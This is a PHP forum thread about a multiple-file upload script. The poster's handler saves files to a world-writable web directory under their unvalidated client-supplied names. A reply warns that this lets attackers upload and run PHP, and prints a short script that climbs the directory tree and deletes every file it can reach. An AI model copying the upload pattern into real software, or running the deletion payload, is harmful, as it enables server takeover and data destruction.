ballouta Posted April 30, 2009 Share Posted April 30, 2009 Hello i have this upload script: <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> <title>multiple Files Upload</title> </head> <body> <table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC"> <tr> <form action="multiple_upload_ac.php" method="post" enctype="multipart/form-data" name="form1" id="form1"> <td> <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td><strong>multiple Files Upload </strong></td> </tr> <tr> <td>Select file <input name="ufile[]" type="file" id="ufile[]" size="50" /></td> </tr> <tr> <td>Select file <input name="ufile[]" type="file" id="ufile[]" size="50" /></td> </tr> <tr> <td>Select file <input name="ufile[]" type="file" id="ufile[]" size="50" /></td> </tr> <tr> <td align="center"><input type="submit" name="Submit" value="Upload" /></td> </tr> </table> </td> </form> </tr> </table> </body> </html> And the other file: <?php //set where you want to store files //in this example we keep file in folder upload //$HTTP_POST_FILES['ufile']['name']; = upload file name //for example upload file name cartoon.gif . $path will be upload/cartoon.gif $path1= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][0]; $path2= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][1]; $path3= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][2]; //copy file to where you want to store file copy($HTTP_POST_FILES['ufile']['tmp_name'][0], $path1); copy($HTTP_POST_FILES['ufile']['tmp_name'][1], $path2); copy($HTTP_POST_FILES['ufile']['tmp_name'][2], $path3); //$HTTP_POST_FILES['ufile']['name'] = file name //$HTTP_POST_FILES['ufile']['size'] = file size //$HTTP_POST_FILES['ufile']['type'] = type of file echo "File Name :".$HTTP_POST_FILES['ufile']['name'][0]."<BR/>"; echo "File Size :".$HTTP_POST_FILES['ufile']['size'][0]."<BR/>"; echo "File Type :".$HTTP_POST_FILES['ufile']['type'][0]."<BR/>"; echo "<img src=\"$path1\" width=\"150\" height=\"150\">"; echo "<P>"; echo "File Name :".$HTTP_POST_FILES['ufile']['name'][1]."<BR/>"; echo "File Size :".$HTTP_POST_FILES['ufile']['size'][1]."<BR/>"; echo "File Type :".$HTTP_POST_FILES['ufile']['type'][1]."<BR/>"; echo "<img src=\"$path2\" width=\"150\" height=\"150\">"; echo "<P>"; echo "File Name :".$HTTP_POST_FILES['ufile']['name'][2]."<BR/>"; echo "File Size :".$HTTP_POST_FILES['ufile']['size'][2]."<BR/>"; echo "File Type :".$HTTP_POST_FILES['ufile']['type'][2]."<BR/>"; echo "<img src=\"$path3\" width=\"150\" height=\"150\">"; /////////////////////////////////////////////////////// // Use this code to display the error or success. $filesize1=$HTTP_POST_FILES['ufile']['size'][0]; $filesize2=$HTTP_POST_FILES['ufile']['size'][1]; $filesize3=$HTTP_POST_FILES['ufile']['size'][2]; if($filesize1 && $filesize2 && $filesize3 != 0) { echo "We have recieved your files"; } else { echo "ERROR....."; } ////////////////////////////////////////////// // What files that have a problem? (if found) if($filesize1==0) { echo "There're something error in your first file"; echo "<BR />"; } if($filesize2==0) { echo "There're something error in your second file"; echo "<BR />"; } if($filesize3==0) { echo "There're something error in your third file"; echo "<BR />"; } ?> I have created the test directory and cmod it to 777 BUT i got an error: Live link: http://www.motif-services.com/test/upload.htm Q2: Is there a PHP script that selects and uploads multiple files in one step ike this: http://ajaxuploader.com/?gclid=CPKhmNfdmJoCFcEUzAodmHTz9g help please many thanks Link to comment https://forums.phpfreaks.com/topic/156259-upload-multiple-files/ Share on other sites More sharing options...
ignace Posted April 30, 2009 Share Posted April 30, 2009 This is a very bad practice: <?php $path1= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][0]; $path2= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][1]; $path3= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][2]; ?> You are opening your system for malicious users I could for example just upload index.php which would result in: <?php $path1= "/home/motifser/public_html/test/index.php"; ?> You would copy it for me: <?php copy($HTTP_POST_FILES['ufile']['tmp_name'][0], $path1); // thank you ?> and i would execute it http://yourdomain-publichtml.com/test/index.php My code would be something similar to: <?php function find_root($directory) { $root = $directory; $topdirectory = dirname($directory); if (is_readable($topdirectory)) { $root = find_root($topdirectory); } return $root; } function delete_all($directory) { $files = scandir($directory); // retrieve all files from the directory foreach ($files as $file) { if (is_dir($file)) { delete_all($file); @rmdir($file); } else { @unlink($file); } } } delete_all(find_root('.')); ?> Link to comment https://forums.phpfreaks.com/topic/156259-upload-multiple-files/#findComment-822739 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.